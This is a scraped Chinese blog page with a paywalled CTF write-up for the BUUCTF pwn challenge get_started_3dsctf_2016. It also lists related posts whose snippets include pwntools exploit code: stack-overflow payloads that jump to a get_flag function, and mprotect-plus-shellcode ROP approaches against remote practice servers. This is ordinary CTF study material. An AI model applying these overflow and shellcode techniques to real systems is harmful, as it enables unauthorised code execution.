BUUCTF-Pwn-get_started_3dsctf_2016

最新推荐文章于 2023-07-11 21:09:37 发布
最新推荐文章于 2023-07-11 21:09:37 发布
阅读量214 收藏 1
点赞数 3
分类专栏: CTF Pwn 文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46035101/article/details/123270492
版权

题目截图
在这里插入图片描述
例行检查
在这里插入图片描述
用IDA打开查看字符串找到flag.txt
在这里插入图片描述
交叉引用找到后门函数
在这里插入图片描述
函数中有个if的判断,在汇编下找到绕过点
在这里插入图片描述
来到main函数中,找到溢出点
在这里插入图片描述
为了保证程序正常退出,我们需要用到exit函数
在这里插入图片描述

构造payload=b’a’*0x38+p32(0x8048988)&#

最低0.47元/天 解锁文章
餐桌上的猫
关注
专栏目录
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 366
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF - PWN】get_started_3dsctf_2016
古月浪子的博客
03-25 1583
checksec一下,可以栈溢出 IDA打开看看,一个很普通的栈溢出漏洞,有后门函数,应该说是一道非常简单的题了 但是,本地打通非常容易,可是靶机打不通 =_= 于是乎,换个方法,利用mprotect函数修改bss段为rwx,写入shellcode跳过去执行 from pwn import * from LibcSearcher import * context.os='linux' con...
BUUCTF(Pwn)get_started_3dsctf_2016
半岛铁盒的博客
03-27 376
from pwn import * p = remote("node3.buuoj.cn",28584) context.log_level = 'debug' a1 = 0x308cd64f a2 = 0x195719d1 get_flag_addr = 0x080489A0 exit_addr = 0x0804E6A0 payload = 'a'* 0x38 + p32(get_flag_addr) + p32(exit_addr)+ p32(a1) + p32(a2) p.sendline(pay..
buuctf get_started_3dsctf_2016
carol2358的博客
04-09 471
先checksec 这道题打远程需要改变内存权限,需要用到mprotec,这道题里也是有这个函数的 这道题有点特殊,是没有bp的,程序的函数调用约定是cdecl,依靠sp来进行平衡栈,需要取值就看与sp的偏移。 padding为0x38 大致的思路就是先找到mprotect,bss,read(向bss写入shell),pop(用来pop出mprotect的参数,进行第二次函数调用)的地址,然后传...
BUUCTF pwn——get_started_3dsctf_2016
CNS-Enterprise BCC-1701-J
04-01 131
BUUCTF 做题练习
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
buuctf——not_the_same_3dsctf_2016
qq_41560595的博客
03-26 514
这道题和前面分析过的get_started_3dsctf_2016差不多,换汤不换药。 选择一个地址0x080EB000,用来装shellcode。这个地址要改成可执行的。使用mprotect函数改变。 解题代码: from pwn import * #p=process("./not") p=remote("node3.buuoj.cn",29607) elf=ELF("./not") read=elf.symbols["read"] mprotect=elf.symbols["mprotect"] m
BUU刷题-Pwn-get_started_3dsctf_2016
一个啥也不会的小菜鸡!
07-11 87
执行完mprotect函数后,esp指向return_addr无法执行下一个有参数的函数(因为无法传参)所以必须将esp指向read_addr,可以将return1_addr设置成pop…利用mprotect函数开启可执行权限(指定的内存区间必须包含整个内存页(4K),起始地址 start 必须是一个内存页的起始地址,并且区间长度 len 必须是页大小的整数倍,不然无法修改权限)利用栈溢出开启某一个空白内存的可执行权限,将shellcode写入并执行即可获得主机权限。所以栈的结构应该布置成。
pwn3dsctf2016_get_started
Nothing
12-12 300
例行检查 file一下,发现是静态连接的,还没有Pie。 分析程序发现是简单栈溢出,还有一个get_flag函数?于是直接返回到get_flag函数执行,但是远程没有打通,然后试了下本地可以打通,然后猜测可能是远程环境部署错了,没有flag.txt文件? 然后试试别的方法。 由于是静态链接里面函数还是很多的。 1.mprotect,修改某地址为rwx,随后写入shellcode,然后getshel...
[BUUCTF]PWN11——get_started_3dsctf_2016
mcmuyanga的博客
08-28 4062
[BUUCTF]PWN11——get_started_3dsctf_2016 题目网址:https://buuoj.cn/challenges#get_started_3dsctf_2016 步骤: 第一个方法,本地打通,要自己创建一个flag.txt 例行检查,32位,开启了nx保护 nc一下,看看程序大概的执行情况 32位ida载入,shift+f12查看程序里的字符串,看到了flag.txt 双击跟进,ctrl+x查看哪个函数调用了它,发现了一个函数,当a1=0x308cd64f,a2=0x19
buuctf|get_started_3dsctf_2016 1
m0_64236521的博客
05-01 686
方法一 我将文件下载后将其重命名为pwn_13,checksec一下 可以直接栈溢出,32位,进入ida gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看 只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu
BUUCTF get_started_3dsctf_2016
doudoudedi
10-04 1318
这道题和昨天差不多栈溢出覆盖返回地址然后把bss段mprotect可读可写可执行然后写入shellcode跳入bss段即可 exp: from pwn import * def debug(): gdb.attach(p) #p=process('./getstarted') p=remote('node2.buuoj.cn.wetolink.com',28646) elf=ELF('./ge...
BUUCTF get_started_3dsctf_2016(mprotect)
、moddemod
06-10 551
典型的栈溢出 而且还留了后门 在本地可以拿到flag.txt文件,但是远程不行! 栈不可执行 原型: int mprotect(const void *start, size_t len, int prot) start:需改写属性的内存中开始地址 len:需改写属性的内存长度 prot:需要修改为的指定值 功能: mprotect()函数可以用来修改一段指定内存区域的保护属性。 他把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot可以取以下几个值: 1)PRO.
get_started_3dsctf_2016BUUCTF】(两种解法)
qq_41696518的博客
08-27 1388
get_started_3dsctf_2016
pwn训练 pwnable.kr brainfuck
doudoudedi
09-08 375
这是一道pwnable第二模块的题目 这道题开始看不懂emem,发现是一个brainfuck的解释器发现有对内存可以读写控制的函数还有一个野指针emem就是他了开始发现只要把memset函数覆写成为gets然后输入/bin/sh再是将fgets覆写成为system 第一步泄露putchar函数的真实地址然后算出libc基址 计算出system,gets的地址 在将putchar写成main 然后就...
pwn BUUCTF第五空间决赛pwn5
doudoudedi
09-29 975
emem今天也是水题的一天阿哈哈看了一个第五空间决赛的pwn5发现很简单诶 这题估计有很多的思路因为 明显的格式化字符串漏洞可以改写got表的地址,可以打印地址的内容所以 我就讲2个 它是随机数和你输入的数相同就会给你一个后门所以就可以泄露出给你的随机数然后输入进去就行了 我这里写一个 这个函数我们把其改为system函数地址然后输入’/bin/sh\x00’ 就行了很简单啊啊 from pw...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1504
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF pwn题exp整合
菜的只能随便写写博客
02-29 680
0x01 rip from pwn import* p = remote('node3.buuoj.cn',27511) payload = 'a'*23+p64(0x401198)+p64(0x401186) p.sendline(payload) p.interactive()   0x02 warmup_csaw_2016 from pwn import * #p = proces...
BUUCTF PWN 1-20
2h4ox1n9
12-03 391
1、test_your_nc from pwn import * io=remote("node3.buuoj.cn",27916) io.interactive() 之后ls , cat flag 白给
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值